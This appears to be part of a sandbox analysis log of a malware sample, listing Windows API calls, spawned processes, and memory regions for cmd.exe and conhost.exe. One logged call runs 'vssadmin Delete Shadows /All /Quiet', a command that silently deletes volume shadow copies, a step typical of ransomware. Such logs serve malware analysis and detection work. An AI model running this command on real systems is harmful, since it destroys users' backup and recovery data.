	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0238.267] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0238.268] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0238.268] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0238.268] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0238.268] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0238.268] GetProcessHeap () returned 0x4630000
	[0238.268] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x4637b30) returned 1
	[0238.268] GetProcessHeap () returned 0x4630000
	[0238.268] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xa) returned 0x4637530
	[0238.268] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0238.276] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=X: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f190*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=X: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f1dc | out: lpCommandLine="vssadmin  Delete Shadows /For=X: /All /Quiet ", lpProcessInformation=0x18f1dc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1398, dwThreadId=0x1094)) returned 1
	[0238.304] CloseHandle (hObject=0xa4) returned 1
	[0238.304] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0238.304] GetProcessHeap () returned 0x4630000
	[0238.305] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463adf0) returned 1
	[0238.305] GetEnvironmentStringsW () returned 0x463a248*
	[0238.305] GetProcessHeap () returned 0x4630000
	[0238.305] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xb9c) returned 0x463adf0
	[0238.305] memcpy (in: _Dst=0x463adf0, _Src=0x463a248, _Size=0xb9c | out: _Dst=0x463adf0) returned 0x463adf0
	[0238.305] FreeEnvironmentStringsA (penv="=") returned 1
	[0238.306] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0258.974] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f174 | out: lpExitCode=0x18f174*=0x2) returned 1
	[0258.976] CloseHandle (hObject=0xa8) returned 1
	[0258.977] _vsnwprintf (in: _Buffer=0x18f25c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f17c | out: _Buffer="00000002") returned 8
	[0258.978] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0258.979] GetProcessHeap () returned 0x4630000
	[0258.979] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463adf0) returned 1
	[0258.979] GetEnvironmentStringsW () returned 0x463a248*
	[0258.979] GetProcessHeap () returned 0x4630000
	[0258.979] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xbc2) returned 0x463c568
	[0258.979] memcpy (in: _Dst=0x463c568, _Src=0x463a248, _Size=0xbc2 | out: _Dst=0x463c568) returned 0x463c568
	[0258.980] FreeEnvironmentStringsA (penv="=") returned 1
	[0258.980] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0258.980] GetProcessHeap () returned 0x4630000
	[0258.980] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463c568) returned 1
	[0258.980] GetEnvironmentStringsW () returned 0x463a248*
	[0258.980] GetProcessHeap () returned 0x4630000
	[0258.980] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xbc2) returned 0x463c568
	[0258.980] memcpy (in: _Dst=0x463c568, _Src=0x463a248, _Size=0xbc2 | out: _Dst=0x463c568) returned 0x463c568
	[0258.981] FreeEnvironmentStringsA (penv="=") returned 1
	[0258.981] GetProcessHeap () returned 0x4630000
	[0258.982] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x4637530) returned 1
	[0258.982] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f208 | out: lpAttributeList=0x18f208) 
	[0258.982] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0258.982] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0259.205] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0259.205] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0259.382] _get_osfhandle (_FileHandle=0) returned 0x38
	[0259.382] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0259.849] SetConsoleInputExeNameW () returned 0x1
	[0259.849] GetConsoleOutputCP () returned 0x1b5
	[0260.330] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0260.330] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0260.548] exit (_Code=2) 

Thread:
	id = 61
	os_tid = 0x1360


Process:
	id = "11"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x33d85000"
	os_pid = "0x1220"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0xe18"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 791
	        start_va = 0x28000000
	          end_va = 0x281fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000028000000"
	        filename = ""

Region:
	              id = 792
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 793
	        start_va = 0xc7e7f70000
	          end_va = 0xc7e7faffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000c7e7f70000"
	        filename = ""

Region:
	              id = 794
	        start_va = 0xc7e8000000
	          end_va = 0xc7e81fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000c7e8000000"
	        filename = ""

Region:
	              id = 795
	        start_va = 0x1fc22ea0000
	          end_va = 0x1fc22ebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22ea0000"
	        filename = ""

Region:
	              id = 796
	        start_va = 0x1fc22ec0000
	          end_va = 0x1fc22ed4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc22ec0000"
	        filename = ""

Region:
	              id = 797
	        start_va = 0x7df5ff2e0000
	          end_va = 0x7ff5ff2dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff2e0000"
	        filename = ""

Region:
	              id = 798
	        start_va = 0x7ff7ff3d0000
	          end_va = 0x7ff7ff3f2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff3d0000"
	        filename = ""

Region:
	              id = 799
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 800
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 801
	        start_va = 0x1fc22ee0000
	          end_va = 0x1fc230fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22ee0000"
	        filename = ""

Region:
	              id = 802
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 803
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 833
	        start_va = 0x1fc22ea0000
	          end_va = 0x1fc22eaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc22ea0000"
	        filename = ""

Region:
	              id = 834
	        start_va = 0x7ff7ff2d0000
	          end_va = 0x7ff7ff3cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff2d0000"
	        filename = ""

Region:
	              id = 835
	        start_va = 0x1fc22ee0000
	          end_va = 0x1fc22f9dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 836
	        start_va = 0x1fc23000000
	          end_va = 0x1fc230fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc23000000"
	        filename = ""

Region:
	              id = 837
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 838
	        start_va = 0xc7e7fb0000
	          end_va = 0xc7e7feffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000c7e7fb0000"
	        filename = ""

Region:
	              id = 839
	        start_va = 0x1fc22fa0000
	          end_va = 0x1fc22fbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22fa0000"
	        filename = ""

Region:
	              id = 840
	        start_va = 0x1fc22eb0000
	          end_va = 0x1fc22eb6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22eb0000"
	        filename = ""

Region:
	              id = 841
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 858
	        start_va = 0x1fc22fa0000
	          end_va = 0x1fc22fa0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc22fa0000"
	        filename = ""

Region:
	              id = 859
	        start_va = 0x1fc22fb0000
	          end_va = 0x1fc22fbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22fb0000"
	        filename = ""

Region:
	              id = 860
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 861
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 862
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 863
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 864
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 865
	        start_va = 0x1fc22fc0000
	          end_va = 0x1fc22fc6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22fc0000"
	        filename = ""

Region:
	              id = 866
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 867
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 898
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 899
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 900
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 945
	        start_va = 0x1fc22fd0000
	          end_va = 0x1fc22fd0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22fd0000"
	        filename = ""

Region:
	              id = 946
	        start_va = 0x1fc22fe0000
	          end_va = 0x1fc22fe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc22fe0000"
	        filename = ""

Region:
	              id = 947
	        start_va = 0x1fc23100000
	          end_va = 0x1fc23287fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc23100000"
	        filename = ""

Region:
	              id = 948
	        start_va = 0x1fc23290000
	          end_va = 0x1fc23410fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc23290000"
	        filename = ""

Region:
	              id = 949
	        start_va = 0x1fc23420000
	          end_va = 0x1fc2481ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc23420000"
	        filename = ""

Region:
	              id = 950
	        start_va = 0x1fc24820000
	          end_va = 0x1fc2499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24820000"
	        filename = ""

Region:
	              id = 968
	        start_va = 0xc7e8200000
	          end_va = 0xc7e823ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000c7e8200000"
	        filename = ""

Region:
	              id = 969
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 970
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 971
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 988
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 989
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 990
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 991
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 992
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 993
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1022
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1023
	        start_va = 0x1fc24820000
	          end_va = 0x1fc2497ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24820000"
	        filename = ""

Region:
	              id = 1024
	        start_va = 0x1fc24990000
	          end_va = 0x1fc2499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24990000"
	        filename = ""

Region:
	              id = 1093
	        start_va = 0x1fc249a0000
	          end_va = 0x1fc24cd6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1094
	        start_va = 0x1fc24820000
	          end_va = 0x1fc24879fff
	       monitored = 1
	     entry_point = 0x1fc248353f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1095
	        start_va = 0x1fc24880000
	          end_va = 0x1fc248a0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1096
	        start_va = 0x1fc24970000
	          end_va = 0x1fc2497ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24970000"
	        filename = ""

Region:
	              id = 1117
	        start_va = 0x1fc24ce0000
	          end_va = 0x1fc24ef6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24ce0000"
	        filename = ""

Region:
	              id = 1132
	        start_va = 0x1fc24f00000
	          end_va = 0x1fc25113fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24f00000"
	        filename = ""

Region:
	              id = 1133
	        start_va = 0x1fc24820000
	          end_va = 0x1fc24931fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24820000"
	        filename = ""

Region:
	              id = 1144
	        start_va = 0x1fc25120000
	          end_va = 0x1fc25330fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc25120000"
	        filename = ""

Region:
	              id = 1145
	        start_va = 0x1fc25340000
	          end_va = 0x1fc25449fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc25340000"
	        filename = ""

Region:
	              id = 1208
	        start_va = 0xc7e8240000
	          end_va = 0xc7e827ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000c7e8240000"
	        filename = ""

Region:
	              id = 1209
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1210
	        start_va = 0x1fc22ff0000
	          end_va = 0x1fc22ff0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc22ff0000"
	        filename = ""

Region:
	              id = 1211
	        start_va = 0x1fc25450000
	          end_va = 0x1fc2550bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc25450000"
	        filename = ""

Region:
	              id = 1212
	        start_va = 0x1fc22ff0000
	          end_va = 0x1fc22ff3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc22ff0000"
	        filename = ""

Region:
	              id = 1213
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1214
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1227
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1228
	        start_va = 0x1fc24940000
	          end_va = 0x1fc24946fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fc24940000"
	        filename = ""

Region:
	              id = 1229
	        start_va = 0x1fc24950000
	          end_va = 0x1fc24950fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc24950000"
	        filename = ""

Region:
	              id = 1230
	        start_va = 0x1fc24960000
	          end_va = 0x1fc24960fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc24960000"
	        filename = ""

Region:
	              id = 1231
	        start_va = 0x1fc24980000
	          end_va = 0x1fc24984fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1232
	        start_va = 0x1fc25510000
	          end_va = 0x1fc25510fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1233
	        start_va = 0x1fc25520000
	          end_va = 0x1fc25521fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc25520000"
	        filename = ""

Region:
	              id = 1234
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1235
	        start_va = 0x1fc25530000
	          end_va = 0x1fc25530fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1236
	        start_va = 0x1fc25540000
	          end_va = 0x1fc25541fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fc25540000"
	        filename = ""


Thread:
	id = 32
	os_tid = 0x1224


Thread:
	id = 37
	os_tid = 0xe68


Thread:
	id = 42
	os_tid = 0xeb8


Thread:
	id = 56
	os_tid = 0x1330


Process:
	id = "12"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x33dc1000"
	os_pid = "0x125c"
